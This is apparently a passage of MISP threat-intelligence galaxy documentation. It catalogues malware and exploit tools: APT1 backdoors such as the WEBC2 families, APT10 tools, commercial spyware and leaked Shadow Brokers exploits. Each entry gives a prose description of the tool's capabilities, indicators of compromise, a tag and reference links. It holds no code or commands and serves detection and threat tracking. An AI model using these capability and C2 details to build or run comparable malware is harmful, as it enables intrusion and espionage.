The trojan serves as a backdoor. It can be controlled remotely.

The tag is: `misp-galaxy:tool="Sathurbot"`

Sathurbot has relationships with:

- similar: `misp-galaxy:malpedia="Sathurbot"` with estimative-language:likelihood-probability="likely"
AURIGA

The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is:  
\textit{misp-galaxy:tool="AURIGA"}

Table 6408. Table References


BANGAT

The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.

The tag is:  
\textit{misp-galaxy:tool="BANGAT"}

Table 6409. Table References


BISCUIT

BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network,
enumerating and manipulating process, and transferring files. BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i).

The tag is: misp-galaxy:tool="BISCUIT"

BISCUIT has relationships with:

- similar: misp-galaxy:mitre-malware="BISCUIT - S0017" with estimative-language:likelihood-probability="likely"

Table 6410. Table References

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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BOUNCER

BOUNCER will load an extracted DLL into memory, and then will call the DLL's dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information. It can accept at most five arguments, including a proxy IP, port and an x.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic.

The tag is: misp-galaxy:tool="BOUNCER"

Table 6411. Table References

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CALENDAR

This family of malware uses Google Calendar to retrieve commands and send results. It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using the hard coded email address and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service dll as a persistence mechanism. Artifacts of this may be found in the registry.

The tag is: misp-galaxy:tool="CALENDAR"

CALENDAR has relationships with:

- similar: misp-galaxy:mitre-malware="CALENDAR - S0025" with estimative-language:likelihood-
COMBOS

The COMBOS malware family is an HTTP based backdoor. The backdoor is capable of file upload, file download, spawning a interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself.

The tag is: misp-galaxy:tool="COMBOS"

COOKIEBAG

This family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command & Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as means of a persistence mechanism. The hardcoded strings cited include a string of a command in common with several other APT1 families.

The tag is: misp-galaxy:tool="COOKIEBAG"

COOKIEBAG is also known as:

- TROJAN.COOKIEBAG

DAIRY

Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall.

The tag is: misp-galaxy:tool="DAIRY"
GETMAIL

Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, one is a dll. The malware may create a registry artifact related to the executable.

The tag is: misp-galaxy:tool="GETMAIL"

GDOCUPLOAD

This family of malware is a utility designed to upload files to Google Docs. Nearly all communications are with docs.google.com are SSL encrypted. The malware does not use Google’s published API to interact with their services. The malware does not currently work with Google Docs. It does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present.

The tag is: misp-galaxy:tool="GDOCUPLOAD"

GLOOXMAIL

GLOOXMAIL communicates with Google’s Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that includes file upload and download, provide a remote shell, sending process listings, and terminating specified processes. The malware makes extensive use of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted.

The tag is: misp-galaxy:tool="GLOOXMAIL"

GLOOXMAIL has relationships with:

- TROJAN.GTALK
• similar: misp-galaxy:mitre-malware="GLOOXMAIL - S0026" with estimative-language:likelihood-probability="likely"


Table 6418. Table References

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GOGGLES

A family of downloader malware, that retrieves an encoded payload from a fixed location, usually in the form of a file with the .jpg extension. Some variants have just an .exe that acts as a downloader, others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory.

The tag is: misp-galaxy:tool="GOGGLES"

GOGGLES is also known as:

• TROJAN.FOXY


Table 6419. Table References

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GREENCAT

Members of this family are full featured backdoors that communicates with a Web-based Command & Control (C2) server over SSL. Features include interactive shell, gathering system info, uploading and downloading files, and creating and killing processes, Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish persistence mechanism for them. Others contains functionality that allows it to install itself, replacing an existing Windows service, and uninstall itself. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories, additional malware artifacts may be found there.

The tag is: misp-galaxy:tool="GREENCAT"


Table 6420. Table References

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HACKFASE

This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL.

The tag is: misp-galaxy:tool="HACKFASE"

HELAUTO

This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation.

The tag is: misp-galaxy:tool="HELAUTO"

KURTON

This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker but defaults to IPRIP if no service name is provided during install.

The tag is: misp-galaxy:tool="KURTON"

LIGHTBOLT

LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified
URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication.

The tag is: `misp-galaxy:tool="LIGHTBOLT"`

**Table 6424. Table References**

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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**LIGHTDART**

LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file. This RAR file (1.rar) is renamed and uploaded to an attacker controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates.

The tag is: `misp-galaxy:tool="LIGHTDART"`

**Table 6425. Table References**

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**LONGRUN**

LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string `thequickbrownfxjmpsvalzydg` is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol.

The tag is: `misp-galaxy:tool="LONGRUN"`

**Table 6426. Table References**

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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**MANITSME**

This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC
looks for both the dropper file and the backdoor.

The tag is: *misp-galaxy:tool="MANITSME"

**Table 6427. Table References**

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**MAPIGET**

This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service).

The tag is: *misp-galaxy:tool="MAPIGET"

**Table 6428. Table References**

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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<td><a href="http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html">http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html</a></td>
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</table>

**MINIASP**

This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval.

The tag is: *misp-galaxy:tool="MINIASP"

**Table 6429. Table References**

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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**NEWSREELS**

The NEWSREELS malware family is an HTTP based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels, one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell.

The tag is: *misp-galaxy:tool="NEWSREELS"
SEASALT

The SEASALT malware family communicates via a custom binary protocol. It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service.

The tag is: misp-galaxy:tool="SEASALT"

STARSYPOUND

STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "(SY)# <HOSTNAME>" to the remote system, where <HOSTNAME> is the hostname of the victim system. The remote host responds with a packet that also begins with the string "(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network.

The tag is: misp-galaxy:tool="STARSYPOUND"

SWORD

This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance.

The tag is: misp-galaxy:tool="SWORD"
**TABMSGSQL**

This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL.

The tag is: *misp-galaxy:tool="TABMSGSQL"*

TABMSGSQL is also known as:

- **TROJAN LETSGO**

**TARSIP-ECLIPSE**

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.

The tag is: *misp-galaxy:tool="TARSIP-ECLIPSE"*

**TARSIP-MOON**

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.
WARP

The WARP malware family is an HTTP based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When the WARP executing remote commands, the malware creates a copy of the ?%SYSTEMROOT%\system32\cmd.exe? file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking.

WEBC2-ADSPACE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are the same file with different MD5 signatures. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a set of HTML tags, part of which are in the File Strings indicator term below.

WEBC2-AUSOV

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between
the tags as commands. This malware family is a only a downloader which operates over the HTTP protocol with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries.

The tag is: *misp-galaxy:tool="WEBC2-AUSOV"*

Table 6439. Table References

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**WEBC2-BOLID**

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.

The tag is: *misp-galaxy:tool="WEBC2-BOLID"*

Table 6440. Table References

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**WEBC2-CLOVER**

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may launch that in a process if an interactive shell is called. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file.

The tag is: *misp-galaxy:tool="WEBC2-CLOVER"*

Table 6441. Table References

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WEBC2-CSON

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking.

The tag is: `misp-galaxy:tool="WEBC2-CSON"`

Table 6442. Table References

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WEBC2-DIV

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and "balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval.

The tag is: `misp-galaxy:tool="WEBC2-DIV"`

Table 6443. Table References

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WEBC2-GREENCAT

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user's registry Run key.

The tag is: `misp-galaxy:tool="WEBC2-GREENCAT"`

Table 6444. Table References

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</table>
WEBC2-HEAD

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system's SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware.

The tag is: misp-galaxy:tool="WEBC2-HEAD"

Table 6445. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
</tr>
</tbody>
</table>

WEBC2-KT3

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.

The tag is: misp-galaxy:tool="WEBC2-KT3"

Table 6446. Table References

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<tbody>
<tr>
<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
</tr>
</tbody>
</table>

WEBC2-QBP

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant will search for two strings in a HTML comment. The first will be “2010QBP ” followed by ”2010QBP//--”. Inside these tags will be a DES-encrypted string.

The tag is: misp-galaxy:tool="WEBC2-QBP"

Table 6447. Table References

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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</table>

WEBC2-RAVE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects
the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware will set itself up as a service and connect out to a hardcoded web page and read a modified base64 string from this webpage. The later versions of this malware supports three commands (earlier ones are just downloaders or reverse shells). The first commands will sleep the malware for N number of hours. The second command will download a binary from the encoded HTML comment and execute it on the infected host. The third will spawn an encoded reverse shell to an attacker specified location and port.

The tag is: misp-galaxy:tool="WEBC2-RAVE"

Table 6448. Table References

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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**WEBC2-TABLE**

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TABLE"

Table 6449. Table References

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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</table>

**WEBC2-TOCK**

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TOCK"

Table 6450. Table References

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<td><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></td>
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</table>
WEBC2-UGX

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or to sleep for a period of time.

The tag is: misp-galaxy:tool="WEBC2-UGX"

Table 6451. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-Y21K

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command & Control (C2) servers. The backdoor has a limited command set, depending on version. It is primarily a downloader, but it classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP & port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but the same functionality. Key signatures include a specific set of functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant.

The tag is: misp-galaxy:tool="WEBC2-Y21K"

Table 6452. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-YAHOO

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The
embedded link can direct the malware to download and execute files.

The tag is: `misp-galaxy:tool="WEBC2-YAHOO"`

Table 6453. Table References

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</table>

**HAYMAKER**

HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string.

The tag is: `misp-galaxy:tool="HAYMAKER"`

HAYMAKER has relationships with:

- similar: `misp-galaxy:mitre-malware="ChChes - S0144"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="ChChes"` with `estimative-language:likelihood-probability="likely"`

Table 6454. Table References

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<tbody>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></td>
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</table>

**BUGJUICE**

BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell.

The tag is: `misp-galaxy:tool="BUGJUICE"`

BUGJUICE has relationships with:

- similar: `misp-galaxy:rat="RedLeaves"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-malware="RedLeaves - S0153"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="RedLeaves"` with `estimative-language:likelihood-`
SNUGRIDE

SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell. Persistence is maintained through a Run registry key.

The tag is: misp-galaxy:tool="SNUGRIDE"

SNUGRIDE has relationships with:

- similar: misp-galaxy:mitre-malware="SNUGRIDE - S0159" with estimative-language:likelihood-probability="likely"

QUASARRAT

QUASARRAT is an open-source RAT available at https://github.com/quasar/QuasarRat. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past.

The tag is: misp-galaxy:tool="QUASARRAT"

da Vinci RCS

Hacking Team’s "DaVinci" Remote Control System is able, the company says, to break encryption and allow law enforcement agencies to monitor encrypted files and emails (even ones encrypted with PGP), Skype and other Voice over IP or chat communication. It allows identification of the
target’s location and relationships. It can also remotely activate microphones and cameras on a computer and works worldwide. Hacking Team claims that its software is able to monitor hundreds of thousands of computers at once, all over the country. Trojans are available for Windows, Mac, Linux, iOS, Android, Symbian and Blackberry.

The tag is: `misp-galaxy:tool="da Vinci RCS"

da Vinci RCS is also known as:

- DaVinci
- Morcut

Table 6458. Table References

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<tr>
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<tbody>
<tr>
<td><a href="http://surveillance.rsf.org/en/hacking-team/">http://surveillance.rsf.org/en/hacking-team/</a></td>
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<tr>
<td><a href="https://wikileaks.org/hackingteam/emails/fileid/581640/267803">https://wikileaks.org/hackingteam/emails/fileid/581640/267803</a></td>
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<tr>
<td><a href="https://wikileaks.org/hackingteam/emails/emailid/31436">https://wikileaks.org/hackingteam/emails/emailid/31436</a></td>
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**LATENTBOT**

LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

The tag is: `misp-galaxy:tool="LATENTBOT"

Table 6459. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html">https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html</a></td>
</tr>
</tbody>
</table>

**FINSPIY**

Though we have not identified the targets, FINSPIY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: `misp-galaxy:tool="FINSPIY"

FINSPIY is also known as:

- BlackOasis

FINSPIY has relationships with:

- similar: misp-galaxy:rat="FINSPIY" with estimative-language:likelihood-probability="likely"
**RCS Galileo**

HackingTeam Remote Control System (RCS) Galileo hacking platform

The tag is: *misp-galaxy:tool=*RCS Galileo*

**EARLYSHOVEL**

RedHat 7.0 - 7.1 Sendmail 8.11.x exploit

The tag is: *misp-galaxy:tool=*EARLYSHOVEL*

**EBBISLAND (EBBSHAVE)**

root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86

The tag is: *misp-galaxy:tool=*EBBISLAND (EBBSHAVE)*

**ECHOWRECKER**

remote Samba 3.0.x Linux exploit

The tag is: *misp-galaxy:tool=*ECHOWRECKER*
EASYBEE

appears to be an MDaemon email server vulnerability

The tag is: misp-galaxy:tool="EASYBEE"

Table 6465. Table References

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<tbody>
<tr>
<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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</table>

EASYPI

an IBM Lotus Notes exploit that gets detected as Stuxnet

The tag is: misp-galaxy:tool="EASYPI"

Table 6466. Table References

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</table>

EWOKFRENZY

an exploit for IBM Lotus Domino 6.5.4 & 7.0.2

The tag is: misp-galaxy:tool="EWOKFRENZY"

Table 6467. Table References

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EXPLODINGCAN

an IIS 6.0 exploit that creates a remote backdoor

The tag is: misp-galaxy:tool="EXPLODINGCAN"

Table 6468. Table References

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<tr>
<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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</table>

ETERNALROMANCE

a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)
**Table 6469. Table References**

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**EDUCATEDSCHOLAR**

a SMB exploit (MS09-050)

The tag is: `misp-galaxy:tool="EDUCATEDSCHOLAR"`

**Table 6470. Table References**

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<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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</table>

**EMERALDTHREAD**

a SMB exploit for Windows XP and Server 2003 (MS10-061)

The tag is: `misp-galaxy:tool="EMERALDTHREAD"`

**Table 6471. Table References**

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<td><a href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></td>
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**EMPHASISMINE**

a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2

The tag is: `misp-galaxy:tool="EMPHASISMINE"`

**Table 6472. Table References**

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**ENGLISHMANSVESTIGATOR**

Outlook Exchange WebAccess rules to trigger executable code on the client's side to send an email to other users

The tag is: `misp-galaxy:tool="ENGLISHMANSVESTIGATOR"`

**Table 6473. Table References**
EPICHERO

0-day exploit (RCE) for Avaya Call Server

The tag is: `misp-galaxy:tool="EPICHERO"`

---

ERRATICGOPHER

SMBv1 exploit targeting Windows XP and Server 2003

The tag is: `misp-galaxy:tool="ERRATICGOPHER"`

---

ETERNALSYNERGY

a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)

The tag is: `misp-galaxy:tool="ETERNALSYNERGY"`

---

ETERNALBLUE

SMBv2 exploit for Windows 7 SP1 (MS17-010)

The tag is: `misp-galaxy:tool="ETERNALBLUE"`

---
ETERNALCHAMPION

a SMBv1 exploit

The tag is: `misp-galaxy:tool="ETERNALCHAMPION"`

Table 6478. Table References

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ESKIMOROLL

Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers

The tag is: `misp-galaxy:tool="ESKIMOROLL"`

Table 6479. Table References

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ESTEEMAUDIT

RDP exploit and backdoor for Windows Server 2003

The tag is: `misp-galaxy:tool="ESTEEMAUDIT"`

Table 6480. Table References

